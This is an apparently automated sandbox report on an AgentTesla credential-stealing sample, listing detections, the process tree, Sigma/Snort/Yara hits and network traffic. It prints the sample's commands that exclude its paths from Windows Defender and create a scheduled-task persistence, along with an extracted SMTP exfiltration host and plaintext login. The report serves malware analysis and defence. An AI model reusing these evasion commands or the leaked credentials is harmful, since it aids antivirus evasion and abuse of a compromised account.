Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P020241901.exe

Overview

General Information

Sample name:P020241901.exe
Analysis ID:1410986
MD5:f061401dd36dc8e88017ef9f9a43e5a7
SHA1:ea4d27815a1cf0f447fab333bdd52825e32807e3
SHA256:935319064e3a30103096a9241c2467b7d19fdbd371d078554a1a7503e1a92cdd
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • P020241901.exe (PID: 4204 cmdline: C:\Users\user\Desktop\P020241901.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
    • powershell.exe (PID: 3184 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3440 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2616 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • P020241901.exe (PID: 7180 cmdline: C:\Users\user\Desktop\P020241901.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
  • VKkzqGUhsZwwm.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
    • schtasks.exe (PID: 7488 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VKkzqGUhsZwwm.exe (PID: 7540 cmdline: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.cup.org.pk", "Username": "naseer@cup.org.pk", "Password": "Cup@123#"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              14.2.VKkzqGUhsZwwm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                14.2.VKkzqGUhsZwwm.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  14.2.VKkzqGUhsZwwm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334ab:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3351d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335a7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33639:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336a3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33715:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337ab:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3383b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.P020241901.exe.3799000.10.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.P020241901.exe.3799000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, ProcessId: 3184, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, ProcessId: 3184, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe, ParentImage: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe, ParentProcessId: 7260, ParentProcessName: VKkzqGUhsZwwm.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp, ProcessId: 7488, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 203.82.48.116, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\P020241901.exe, Initiated: true, ProcessId: 7180, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, ProcessId: 2616, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe, ProcessId: 3184, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp, ProcessId: 2616, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:03/18/24-14:32:22.806223
                      SID:2855542
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:22.806223
                      SID:2855245
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:22.806223
                      SID:2840032
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942080
                      SID:2030171
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:22.806223
                      SID:2851779
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942080
                      SID:2839723
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942146
                      SID:2855542
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942146
                      SID:2855245
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:22.806192
                      SID:2030171
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:22.806192
                      SID:2839723
                      Source Port:49711
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942146
                      SID:2840032
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/18/24-14:32:19.942146
                      SID:2851779
                      Source Port:49708
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: P020241901.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeAvira: detection malicious, Label: HEUR/AGEN.1306659
                      Found malware configuration
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.cup.org.pk", "Username": "naseer@cup.org.pk", "Password": "Cup@123#"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeReversingLabs: Detection: 65%
                      Multi AV Scanner detection for submitted file
                      Source: P020241901.exeReversingLabs: Detection: 65%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: P020241901.exeJoe Sandbox ML: detected
                      Source: P020241901.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: P020241901.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: kugJ.pdbSHA256 source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
                      Source: Binary string: kugJ.pdb source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 4x nop then jmp 06ED8906h0_2_06ED85E7
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 4x nop then jmp 06B876CEh10_2_06B873AF

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49711 -> 203.82.48.116:587
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: Joe Sandbox ViewASN Name: NAYATEL-PKNayatelPvtLtdPK NAYATEL-PKNayatelPvtLtdPK
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 203.82.48.116:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.cup.org.pk
                      Source: P020241901.exe, 00000009.00000002.3234380229.0000000002A58000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3233407833.0000000002B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cup.org.pk
                      Source: P020241901.exe, 00000000.00000002.2001137973.0000000002581000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000A.00000002.2042466300.0000000002679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, n00.cs.Net Code: meEYaI
                      Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, n00.cs.Net Code: meEYaI

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 0.2.P020241901.exe.4e90000.13.raw.unpack, coEDuL4BIACsOV2Bcb.csLarge array initialization: : array initializer size 18997
                      Source: 0.2.P020241901.exe.25a3510.0.raw.unpack, coEDuL4BIACsOV2Bcb.csLarge array initialization: : array initializer size 18997
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_0097DCB40_2_0097DCB4
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_04A96CC80_2_04A96CC8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_04A900060_2_04A90006
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_04A900400_2_04A90040
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_04A96CB90_2_04A96CB9
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED3FD80_2_06ED3FD8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED37680_2_06ED3768
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED1C880_2_06ED1C88
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED3BA00_2_06ED3BA0
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED20C00_2_06ED20C0
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06ED20B00_2_06ED20B0
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_028093789_2_02809378
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_02804A989_2_02804A98
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_02809B309_2_02809B30
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_02803E809_2_02803E80
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_0280CE889_2_0280CE88
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_028041C89_2_028041C8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CCBCE89_2_05CCBCE8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC3F489_2_05CC3F48
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC56D89_2_05CC56D8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC2EE89_2_05CC2EE8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC00409_2_05CC0040
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC8B889_2_05CC8B88
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC9AC89_2_05CC9AC8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CCDDD89_2_05CCDDD8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC4FF89_2_05CC4FF8
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CC36489_2_05CC3648
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_0251DCB410_2_0251DCB4
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_04BC6CC810_2_04BC6CC8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_04BC000610_2_04BC0006
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_04BC004010_2_04BC0040
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_04BC6CB910_2_04BC6CB9
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B83FD810_2_06B83FD8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B8376810_2_06B83768
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B81C8810_2_06B81C88
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B83BA010_2_06B83BA0
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B820B010_2_06B820B0
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B820C010_2_06B820C0
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AA937814_2_02AA9378
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AA4A9814_2_02AA4A98
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AA9B3014_2_02AA9B30
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AACE8814_2_02AACE88
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AA3E8014_2_02AA3E80
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_02AA41C814_2_02AA41C8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F4DD0014_2_05F4DD00
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F4BCE814_2_05F4BCE8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F43F4814_2_05F43F48
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F42EE814_2_05F42EE8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F456D814_2_05F456D8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F4004014_2_05F40040
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F48B8814_2_05F48B88
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F49AC814_2_05F49AC8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F44FF814_2_05F44FF8
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 14_2_05F4364814_2_05F43648
                      Source: P020241901.exe, 00000000.00000002.2000269983.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs P020241901.exe
                      Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs P020241901.exe
                      Source: P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9bd5bdf1-67e0-44ac-acb3-9f26dbc64b5d.exe4 vs P020241901.exe
